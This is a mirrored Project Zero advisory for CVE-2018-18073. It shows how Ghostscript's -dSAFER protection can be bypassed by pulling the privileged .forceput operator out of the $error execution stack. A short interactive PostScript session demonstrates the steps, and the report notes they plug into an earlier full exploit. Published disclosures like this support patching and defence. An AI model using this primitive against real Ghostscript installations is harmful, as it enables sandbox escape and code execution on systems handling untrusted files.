Ghostscript has an issue where an error object can expose system operators in the saved execution stack.
dcb624d6a7e684d9f9b8d63bc29a62e9a0cef57276d16e3a9b3f918f9d52cdbaghostscript: $error object can expose system operators in saved execution stack.
CVE-2018-18073
I've found a way of getting access to .forceput even after the fix in <a href="/p/project-zero/issues/detail?id=1682" title="ghostscript: executeonly bypass with errorhandler setup" class="closed_ref" rel="nofollow"> bug 1682 </a>, you can pull it out of the saved execution stack in $error:
$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit) (r) --.systemvmfile--} --stopped-- {--pop-- --pop-- $error /errorname --get-- /undefinedfilename --eq-- {.clearerror --exit--} --if-- /handleerror --.systemvar-- --exec-- null} --if-- --cvx-- {.runexec} .execute --pop--} --%loop_continue-- {--pop--} {$error /newerror --get-- --and-- {/handleerror --.systemvar-- --exec-- --flush-- true} {false} --ifelse--} false 1 --%stopped_push-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1919 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}]
Notice the .forceput in there...
GS>$error /estack get 29 get ==
{-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}
GS>$error /estack get 29 get 6 get ==
--.forceput--
GS>
See <a href="/p/project-zero/issues/detail?id=1682" title="ghostscript: executeonly bypass with errorhandler setup" class="closed_ref" rel="nofollow"> bug 1682 </a> for a full exploit using .forceput, this code can just be plugged in and the full exploit will still work.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Found by: taviso
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed